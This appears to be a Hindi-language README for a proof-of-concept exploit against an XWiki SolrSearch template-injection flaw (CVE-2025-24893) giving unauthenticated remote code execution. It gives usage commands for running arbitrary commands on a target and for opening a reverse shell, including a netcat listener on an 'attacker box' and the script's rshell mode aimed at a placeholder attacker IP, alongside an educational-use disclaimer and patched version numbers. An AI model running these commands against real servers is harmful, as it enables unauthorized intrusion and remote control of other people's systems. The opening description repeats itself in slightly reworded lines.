
XWiki SolrSearch (CVE-2025-24893) के लिए अनधिकृत RCE PoC. कमांड निष्पादन + रिवर्स शेल.
XWiki SolrSearch के लिए बिना प्रमाणीकरण के RCE PoC (CVE-2025-24893). कमांड निष्पादन + रिवर्स शेल।
XWiki SolrSearch टेम्पलेट इंजेक्शन के लिए प्रूफ-ऑफ-कॉन्सेप्ट जो बिना प्रमाणीकरण के रिमोट कोड निष्पादन की ओर ले जाता है।
XWiki Debian 15.10.8 पर परीक्षण किया गया (15.10.11 / 16.4.1 / 16.5.0RC1 में पैच किया गया).
⚠️ केवल शैक्षिक उपयोग के लिए। इसे उन सिस्टमों पर न चलाएं जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है।
/xwiki/bin/get/Main/SolrSearch के माध्यम से तैयार किए गए Groovy पेलोड भेजता है।pip install requests
स्क्रिप्ट चलाते समय लक्ष्य होस्ट (और वैकल्पिक पथ) निर्दिष्ट करें।
बुनियादी कमांड चलाएं:
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "id"
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "whoami"
रिवर्स शेल प्रारंभ करें:
# On attacker box
nc -lvnp 4444
# From the PoC
python3 xwiki_solr_rce.py --target http://wiki.example.tld rshell <attacker_ip> 4444
/xwiki/bin/get/Main/SolrSearch?media=rss&text=...